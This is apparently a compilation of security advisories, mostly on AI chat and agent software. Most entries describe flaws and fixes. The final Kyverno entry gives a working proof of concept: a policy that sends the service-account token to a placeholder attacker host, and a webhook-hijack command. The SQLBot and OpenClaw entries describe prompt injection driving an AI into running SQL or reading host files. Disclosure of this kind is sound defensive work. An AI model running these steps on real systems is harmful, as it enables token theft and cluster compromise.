Full description
Improper authorization in Microsoft Teams allows an authorized attacker to disclose information over a network.
Vulnerability type
CWE-285 — CWE-285
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Full description
OpenClaw before 2026.4.15 contains an authorization bypass vulnerability in Matrix room control-command authorization that trusts DM pairing-store entries. Attackers with DM-paired sender IDs can execute room control commands without being in configured allowlists by posting in bot rooms, potentially enabling privileged OpenClaw behavior.
Affected versions
2026.4.15
Vulnerability type
CWE-863 — Incorrect Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References
https://github.com/openclaw/openclaw/commit/f8705f512b09043df02b5da372c33374734bd921
https://github.com/openclaw/openclaw/security/advisories/GHSA-2gvc-4f3c-2855
https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-matrix-room-control-commands-via-dm-pairing-store
Full description
Dify before version 1.14.0 contains an authorization bypass vulnerability that allows authenticated users to read the full contents of files uploaded by other users within the same tenant by supplying an arbitrary file UUID in the files array of a chat-messages request. Attackers can exploit insufficient permission verification in the chat-messages endpoints to access files without ownership validation, bypassing workspace separation and signed URL protections to retrieve sensitive file contents through workflow processing.
Vulnerability type
CWE-639 — IDOR
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Full description
SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. In versions 1.7.0 and earlier, the Text2SQL chat interface is vulnerable to prompt injection. The user-provided question parameter is directly concatenated into the LLM prompt without filtering or escaping, and the SQL extracted from the LLM response is executed against the database without validation or sanitization. An authenticated attacker can craft a malicious question to manipulate the LLM into generating and executing arbitrary SQL statements. When connected to a PostgreSQL data source, this can lead to remote code execution via COPY FROM PROGRAM. This issue has been fixed in version 1.7.1.
Affected versions
1.7.1
Vulnerability type
CWE-89 — SQL Injection
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
A vulnerability was found in chatchat-space Langchain-Chatchat up to 0.3.1.3. The affected element is the function _get_file_id of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Uploaded File Handler. Performing a manipulation results in insufficiently random values. Access to the local network is required for this attack. The attack's complexity is rated as high. The exploitability is described as difficult. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.
Affected versions
All versions < 0.3.0, 0.3.0.20240506, 0.3.0.20240606, 0.3.0.20240610, 0.3.0.20240610.1
Vulnerability type
CWE-310 — Crypto Issue
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
References
https://github.com/chatchat-space/Langchain-Chatchat/
https://github.com/chatchat-space/Langchain-Chatchat/issues/5464
https://vuldb.com/submit/807796
https://vuldb.com/vuln/361126
https://vuldb.com/vuln/361126/cti
Full description
A vulnerability has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. Impacted is the function files of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component OpenAI-Compatible File Upload API. Such manipulation of the argument file.filename leads to time-of-check time-of-use. Access to the local network is required for this attack to succeed. The attack requires a high level of complexity. The exploitability is considered difficult. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Affected versions
All versions < 0.3.0, 0.3.0.20240506, 0.3.0.20240606, 0.3.0.20240610, 0.3.0.20240610.1
Vulnerability type
CWE-362 — Race Condition
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
References
https://github.com/chatchat-space/Langchain-Chatchat/
https://github.com/chatchat-space/Langchain-Chatchat/issues/5463
https://vuldb.com/submit/807795
https://vuldb.com/vuln/361125
https://vuldb.com/vuln/361125/cti
Full description
A flaw has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. This issue affects the function PIL.Image.tobytes of the file libs/chatchat-server/chatchat/webui_pages/dialogue/dialogue.py of the component Vision Chat Paste Image Handler. This manipulation of the argument paste_image.image_data causes use of weak hash. The attacker needs to be present on the local network. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Affected versions
All versions < 0.3.0, 0.3.0.20240506, 0.3.0.20240606, 0.3.0.20240610, 0.3.0.20240610.1
Vulnerability type
CWE-327 — Weak Crypto
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
References
https://github.com/chatchat-space/Langchain-Chatchat/
https://github.com/chatchat-space/Langchain-Chatchat/issues/5462
https://vuldb.com/submit/807794
https://vuldb.com/vuln/361124
https://vuldb.com/vuln/361124/cti
Full description
A vulnerability was detected in chatchat-space Langchain-Chatchat up to 0.3.1.3. This vulnerability affects the function files/list_files/retrieve_file/retrieve_file_content/delete_file of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Compatible File Service. The manipulation results in missing authentication. The attacker must have access to the local network to execute the attack. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-287 — Auth Bypass
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
References
https://github.com/chatchat-space/Langchain-Chatchat/
https://github.com/chatchat-space/Langchain-Chatchat/issues/5465
https://vuldb.com/submit/807790
https://vuldb.com/vuln/361123
https://vuldb.com/vuln/361123/cti
Full description
## Summary

Microsoft Teams SSO invoke handler missed sender authorization checks.

## Affected Packages / Versions

- Package: `openclaw`
- Ecosystem: npm
- Affected versions: `>= 2026.4.10 < 2026.4.14`
- Patched versions: `>= 2026.4.14`

## Impact

Microsoft Teams SSO signin invoke handling could process an invoke from a sender before applying the same sender allowlist checks used by normal message handling.

## Technical Details

The fix routes SSO invoke handling through the Teams sender authorization path and adds coverage for denied senders.

## Fix

The issue was fixed in #66033. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.

## Fix Commit(s)

- `80b1fa17bfc3f6a668492f0326ea52f48bb89776`
- PR: #66033

## Release Process Note

Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.

## Credits

Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.
Affected versions
2026.4.10 - 2026.4.14
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Full description
## Summary

Discord event cover images bypassed sandbox media normalization.

## Affected Packages / Versions

- Package: `openclaw`
- Ecosystem: npm
- Affected versions: `>= 2026.4.7 < 2026.4.10`
- Patched versions: `>= 2026.4.10`

## Impact

Discord event cover image parameters could bypass the sandbox media normalization path used for outbound local media, allowing host-local media references to reach a channel action path that expected normalized media.

## Technical Details

The fix includes Discord `eventCreate.image` in sandbox media normalization and adds coverage for the event-create media path.

## Fix

The issue was fixed in #64377. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.

## Fix Commit(s)

- `979c6f09d6fad96596feb91c905934be7e0b4f15`
- PR: #64377

## Release Process Note

Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.

## Credits

Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.
Affected versions
2026.4.7 - 2026.4.10
Vulnerability type
CWE-184 — CWE-184
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Full description
The GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Vulnerability type
CWE-89 — SQL Injection
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Full description
## Summary

The HTTP login endpoints (`POST /login` and `POST /signalk/v1/auth/login`) are protected by `express-rate-limit` (default: 100 attempts per 10-minute window, configurable via `HTTP_RATE_LIMITS`). The WebSocket login path — sending `{login: {username, password}}` messages over an established WebSocket connection — calls `app.securityStrategy.login()` directly without any rate limiting.

An attacker can bypass HTTP rate limiting entirely by opening a WebSocket connection and attempting unlimited password guesses at the speed bcrypt allows (~20 attempts/sec with 10 salt rounds).

## Details

**Vulnerable code:** `src/interfaces/ws.ts`, function `processLoginRequest` (lines 753-780)

The function directly calls `app.securityStrategy.login(msg.login.username, msg.login.password)` with no throttling or attempt tracking.

**Rate-limited HTTP path for comparison:** `src/tokensecurity.ts` lines 609-617 apply `loginLimiter` middleware to the HTTP login routes at line 637.

## Steps to Reproduce

1. Start Signal K server with security enabled
2. Open a WebSocket connection to `ws://server:3000/signalk/v1/stream?subscribe=none`
3. Wait for the hello message
4. Send login attempts in rapid succession:

   ```json
   {"requestId": "1", "login": {"username": "admin", "password": "guess1"}}
   {"requestId": "2", "login": {"username": "admin", "password": "guess2"}}
   ```

5. Observe that all attempts are processed without any 429 response or throttling
6. For comparison, send 100+ HTTP POST requests to `/signalk/v1/auth/login` — the 101st returns 429

A POC script is available that demonstrates both the HTTP rate limiting working correctly and the WebSocket path accepting unlimited attempts.

## Impact

- Credential brute-forcing via the WebSocket protocol at ~20 attempts/sec (bcrypt-limited)
- Complete bypass of the HTTP rate limiting defense
- A single WebSocket connection is sufficient for unlimited attempts
- With multiple parallel connections, throughput multiplies
- A 10,000-word dictionary attack completes in ~8 minutes over a single connection

Signal K servers are commonly deployed on boat networks where they may be accessible to other devices on the same LAN.

## CWE

CWE-307: Improper Restriction of Excessive Authentication Attempts

## Suggested Fix

Track failed login attempts per remote IP in a shared store (or reuse the existing express-rate-limit store) that is checked in both the HTTP login middleware and the processLoginRequest WebSocket handler.

## Context

Found while building an open source maritime security scanner. Verified on v2.24.0 (current master).

Discovered by Mark Curphey
Affected versions
All versions < 2.25.0
Vulnerability type
CWE-307 — CWE-307
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
Full description
A security vulnerability has been detected in Telegram Desktop up to 6.7.5. This vulnerability affects the function RequestButton of the file Telegram/SourceFiles/boxes/url_auth_box.cpp of the component Bot API. The manipulation of the argument login_url leads to null pointer dereference. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Vulnerability type
CWE-404 — CWE-404
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
Full description
A vulnerability has been found in ChatGPTNextWeb NextChat up to 2.16.1. Affected is the function addMcpServer of the file app/mcp/actions.ts. The manipulation leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-266 — CWE-266
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Full description
A flaw has been found in ChatGPTNextWeb NextChat up to 2.16.1. This impacts an unknown function of the file Next.js of the component API Endpoint. Executing a manipulation can lead to permissive cross-domain policy with untrusted domains. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-346 — CWE-346
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Full description
## Impact

OpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment check used by other media-serving paths. If an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response.

This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check.

The impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API.

## Affected Packages / Versions

- Package: `openclaw` on npm
- Affected versions: `<= 2026.4.14`
- Patched version: `2026.4.15`

The latest public release, `2026.4.21`, also contains the fix.

## Patches

The public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding.

Fix commit:

- `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde`

## Workarounds

Upgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed.

Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs.

## Credits

OpenClaw thanks @zsxsoft for reporting.
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
Full description
## Impact

The `/chat` WebSocket endpoint used by the Chat Trigger node's Hosted Chat feature did not verify that an incoming connection was authorized to interact with the target execution. An unauthenticated remote attacker who could identify a valid execution ID for a workflow in a waiting state could attach to that execution, receive the pending prompt intended for the legitimate user, and submit arbitrary input to resume or influence downstream workflow behavior.

Exploitation requires the following conditions:

- The instance exposes a public Hosted Chat workflow with authentication set to `None`.
- A target execution is in a waiting state at the time of the attack.
- The attacker can obtain or discover the execution ID of that waiting execution.

## Patches

The issue has been fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1. Users should upgrade to one of these versions or later to remediate the vulnerability.

## Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations:

- Enable authentication on all Chat Trigger nodes by setting the Authentication field to `n8n User Auth` rather than `None`.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

---

n8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility.

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
Affected versions
< 1.123.32, >= 2.18.0, < 2.18.1, >= 2.0.0, < 2.17.4
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
Full description
A vulnerability was identified in NousResearch hermes-agent 0.8.0. Affected by this issue is some unknown functionality of the file gateway/platforms/wecom.py of the component WeChat Work Platform Adapter. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.
Vulnerability type
CWE-22 — Path Traversal
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Full description
DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.
Vulnerability type
CWE-77 — Command Injection
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
Jenkins Matrix Authorization Strategy Plugin 2.0-beta-1 through 3.2.9 (both inclusive) invokes parameterless constructors of classes specified in configuration when deserializing inheritance strategies, without restricting the classes that can be instantiated. This can be abused by attackers with Item/Configure permission to instantiate arbitrary types, which may lead to information disclosure or other impacts depending on the classes available on the classpath. Matrix Authorization Strategy Plugin 3.2.10 verifies that the class being instantiated is an inheritance strategy implementation, preventing instantiation of arbitrary types.
Affected versions
2.0, 2.0-beta-1, 2.0-beta-2, 2.0-beta-3, 2.1
Vulnerability type
CWE-502 — Deserialization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Full description
## Summary

MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion

## Current Maintainer Triage

- Status: open
- Normalized severity: medium
- Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `3834d47099dd13c8244ed6de8b9ea9855c553623` — 2026-03-30T13:46:40+01:00

OpenClaw thanks @AntAISecurityLab for reporting.
Affected versions
2026.3.31
Vulnerability type
CWE-408 — CWE-408
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Full description
## Summary

Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps

## Current Maintainer Triage

- Status: narrow
- Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00

OpenClaw thanks @cyjhhh for reporting.
Affected versions
2026.3.31
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Full description
## Summary

Discord voice manager bypasses channel-level member access allowlist

## Current Maintainer Triage

- Status: open
- Normalized severity: medium
- Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00

## Release Process Note

- The fix is already present in released version `2026.3.31`.
- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.

Thanks @zsxsoft for reporting.
Affected versions
2026.3.31
Vulnerability type
CWE-863 — Incorrect Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Full description
## Summary

Matrix thread root and reply context bypass sender allowlist

## Current Maintainer Triage

- Status: open
- Normalized severity: medium
- Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00

OpenClaw thanks @AntAISecurityLab for reporting.
Affected versions
2026.3.31
Vulnerability type
CWE-346 — CWE-346
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Full description
## Summary

Discord audio preflight transcription before member authorization

## Current Maintainer Triage

- Status: narrow
- Normalized severity: medium
- Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00

OpenClaw thanks @AntAISecurityLab for reporting.
Affected versions
2026.3.31
Vulnerability type
CWE-408 — CWE-408
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Full description
In Spring AI, an attacker can bypass conversation isolation and exfiltrate sensitive memory from other users’ chat histories, including secrets and credentials, by injecting filter logic through conversationId. Only applications that use VectorStoreChatMemoryAdvisor and pass user-supplied input as a conversationId are affected.
Affected versions
1.0.0 - 1.0.6
Vulnerability type
CWE-284 — CWE-284
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Full description
A vulnerability was identified in BigSweetPotatoStudio HyperChat up to 2.0.0-alpha.63. Affected by this issue is the function fetch of the file packages/core/src/http/aiProxyMiddleware.mts of the component AI Proxy Middleware. Such manipulation of the argument baseurl leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-918 — SSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Full description
OpenClaw versions 2026.2.14 through 2026.3.24 fail to consistently apply guild and channel policy gates to Discord button and component interactions. Attackers can trigger privileged component actions from blocked contexts by bypassing channel policy enforcement.
Affected versions
2026.2.14 - 2026.3.28
Vulnerability type
CWE-863 — Incorrect Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
Full description
## Summary

MSTeams thread history bypasses sender allowlist via Graph API

## Current Maintainer Triage

- Status: open
- Normalized severity: medium
- Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00

OpenClaw thanks @AntAISecurityLab for reporting.
Affected versions
2026.3.31
Vulnerability type
CWE-441 — CWE-441
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Full description
A weakness has been identified in ChatGPTNextWeb NextChat up to 2.16.1. This affects the function storeUrl of the file app/api/artifacts/route.ts of the component Artifacts Endpoint. This manipulation of the argument ID causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-918 — SSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Full description
A security flaw has been discovered in ChatGPTNextWeb NextChat up to 2.16.1. Affected by this issue is the function proxyHandler of the file app/api/[provider]/[...path]/route.ts. The manipulation results in server-side request forgery. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-918 — SSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Full description
A vulnerability was detected in JoeCastrom mcp-chat-studio up to 1.5.0. Affected by this issue is some unknown functionality of the file server/routes/llm.js of the component LLM Models API. Performing a manipulation of the argument req.query.base_url results in server-side request forgery. Remote exploitation of the attack is possible. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-918 — SSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Full description
A vulnerability was determined in code-projects Chat System 1.0. Affected is an unknown function of the file update_user.php of the component MD5 Hash Handler. This manipulation of the argument Password causes use of weak hash. The attack is possible to be carried out remotely. The attack's complexity is rated as high. The exploitability is told to be difficult. The exploit has been publicly disclosed and may be utilized.
Vulnerability type
CWE-327 — Weak Crypto
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
Full description
A vulnerability was detected in code-projects Chat System 1.0. This affects an unknown function of the file /admin/send_message.php of the component Chat Interface. The manipulation of the argument msg results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.
Vulnerability type
CWE-79 — XSS
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
Full description
A weakness has been identified in Toowiredd chatgpt-mcp-server up to 0.1.0. Affected by this issue is some unknown functionality of the file src/services/docker.service.ts of the component MCP/HTTP. This manipulation causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Vulnerability type
CWE-77 — Command Injection
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Full description
A client holding only a read JWT scope can still register itself as a signal provider through the production kuksa.val.v2 OpenProviderStream API by sending ProvideSignalRequest.

1. Obtain any valid token with only read scope.
2. Connect to the normal production gRPC API (kuksa.val.v2).
3. Open OpenProviderStream.
4. Send ProvideSignalRequest for a target signal ID.
5. Wait for the broker to forward GetProviderValueRequest.
6. Reply with attacker-controlled GetProviderValueResponse.
7. Other clients performing GetValue / GetValues for that signal receive forged data.
Vulnerability type
CWE-306 — Auth Bypass
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
The HubSpot All-In-One Marketing - Forms, Popups, Live Chat plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.3.32 via the leadin/public/admin/class-adminconstants.php file. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract a list of all installed plugins and their versions which can be leveraged for reconnaissance and further attacks.
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Full description
## Summary

Kyverno's apiCall feature in ClusterPolicy automatically attaches the admission controller's ServiceAccount token to outgoing HTTP requests. The service URL has no validation — it can point anywhere, including attacker-controlled servers. Since the admission controller SA has permissions to patch webhook configurations, a stolen token leads to full cluster compromise.

## Affected version

Tested on Kyverno v1.17.1 (Helm chart default installation). Likely affects all versions with apiCall service support.

## Details

There are two issues that combine into one attack chain.

The first is in `pkg/engine/apicall/executor.go` around line 138. The service URL from the policy spec goes straight into `http.NewRequestWithContext()`:

```go
req, err := http.NewRequestWithContext(ctx, string(apiCall.Method), apiCall.Service.URL, data)
```

No scheme check, no IP restriction, no allowlist. The policy validation webhook (`pkg/validation/policy/validate.go`) only looks at JMESPath syntax.

The second is at lines 155-159 of the same file. If the request doesn't already have an Authorization header, Kyverno reads its own SA token and injects it:

```go
if req.Header.Get("Authorization") == "" {
    token := a.getToken()
    req.Header.Add("Authorization", "Bearer "+token)
}
```

The token is the admission controller's long-lived SA token from `/var/run/secrets/kubernetes.io/serviceaccount/token`. With the default Helm install, this SA (`kyverno-admission-controller`) can read and PATCH both `MutatingWebhookConfiguration` and `ValidatingWebhookConfiguration`.

## Reproduction

**Environment**: Kyverno v1.17.1, K3s v1.34.5, single-node cluster, default Helm install

**Step 1**: Start an HTTP listener on an attacker machine:

```python
# capture_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import json, datetime

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        print(json.dumps({
            "timestamp": str(datetime.datetime.now()),
            "path": self.path,
            "headers": dict(self.headers)
        }, indent=2))
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(b'{"ok": true}')

HTTPServer(("0.0.0.0", 9999), Handler).serve_forever()
```

**Step 2**: Create a ClusterPolicy that calls the attacker server:

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: ssrf-poc
spec:
  validationFailureAction: Audit
  background: false
  rules:
    - name: exfil
      match:
        any:
          - resources:
              kinds:
                - Pod
      context:
        - name: exfil
          apiCall:
            service:
              url: "http://ATTACKER-IP:9999/steal"
            method: GET
            jmesPath: "@"
      validate:
        message: "check"
        deny:
          conditions:
            any:
              - key: "{{ exfil }}"
                operator: Equals
                value: "NEVER_MATCHES"
```

**Step 3**: Create any pod to trigger policy evaluation:

```bash
kubectl run test --image=nginx
```

**Step 4**: The listener receives the SA token immediately:

```
Authorization: Bearer eyJhbGciOiJSUzI1NiIs...
```

Decoded JWT `sub` claim: `system:serviceaccount:kyverno:kyverno-admission-controller`

Every subsequent pod creation sends the token again. No race condition, no timing — it fires every time.

**Step 5**: Use the token to hijack webhooks:

```bash
# Verify permissions
kubectl auth can-i patch mutatingwebhookconfigurations \
  --as=system:serviceaccount:kyverno:kyverno-admission-controller
# yes

# Patch the webhook to redirect to attacker
kubectl patch mutatingwebhookconfiguration kyverno-policy-mutating-webhook-cfg \
  --type='json' \
  -p='[{"op":"replace","path":"/webhooks/0/clientConfig/url","value":"https://ATTACKER:443/mutate"}]' \
  --token="eyJhbG..."
```

After this, every K8s API request that triggers the webhook goes to the attacker's server. The attacker can mutate any pod spec — inject containers, mount host paths, add privileged security contexts.

## Verified permissions of stolen token

Tested with the default Helm installation:

| Action | Result |
|--------|--------|
| List pods (all namespaces) | Allowed |
| Read configmaps in kube-system | Allowed |
| PATCH MutatingWebhookConfiguration | **Allowed** |
